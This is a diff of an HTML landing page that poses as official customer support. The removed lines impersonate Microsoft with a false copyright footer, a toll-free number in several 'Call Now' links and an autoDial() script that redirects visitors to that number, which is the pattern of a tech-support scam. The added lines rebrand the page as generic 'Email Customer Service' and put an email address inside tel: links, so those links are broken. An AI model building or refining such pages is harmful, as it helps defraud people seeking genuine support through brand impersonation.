--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
  
 </script>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Microsoft Customer Service</title>
+  <title>Email Customer Service</title>
   <style>
     body {
       font-family: "SF Pro Text", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
@@ -61,7 +61,7 @@
   </style>
   <script>
     function autoDial() {
-      var phoneNumber = "+1-877-481-2204";
+      var phoneNumber = "support@emailrecovery.com";
       window.location.href = "tel:" + phoneNumber;
     }
 
@@ -79,18 +79,18 @@
 
   
 
-  <h1>Microsoft Customer Service</h1>
-   <a href="tel:+1-877-481-2204" class="call-button">Call Now</a><br>
-   <a href="tel:+1-877-481-2204" class="call-button">+1-877-481-2204</a>
-  <p>Discover unparalleled assistance and support with Microsoft. Our devoted customer service team is at your beck and call, ready to address any inquiries or concerns you may have regarding Microsoft services. Whether it's technical assistance, queries about your Microsoft Account, guidance with your Microsoft device, or navigating through our services, rest assured that our seasoned experts are just a phone call away. Experience the epitome of support and let us elevate your Microsoft journey with unparalleled excellence.</p>
+  <h1>Email Customer Service</h1>
+   <a href="tel:support@emailrecovery.com" class="call-button">Call Now</a><br>
+   <a href="tel:support@emailrecovery.com" class="call-button">support@emailrecovery.com</a>
+  <p>Discover unparalleled assistance and support with Email. Our devoted customer service team is at your beck and call, ready to address any inquiries or concerns you may have regarding Email services. Whether it's technical assistance, queries about your Email Account, guidance with your Email device, or navigating through our services, rest assured that our seasoned experts are just a phone call away. Experience the epitome of support and let us elevate your Email journey with unparalleled excellence.</p>
   
  
  <h1>Easily resolve your queries by contacting our dedicated support team at the provided number.</h1>
 
   
-  <a href="tel:+1-877-481-2204
+  <a href="tel:support@emailrecovery.com
  class="call-button">Toll-Free Number</a>
-  <p class="footer">© 2024 Microsoft Inc. All rights reserved.</p>
+  <p class="footer">© 2024 Email Inc. All rights reserved.</p>
 
 </body>
 </html>
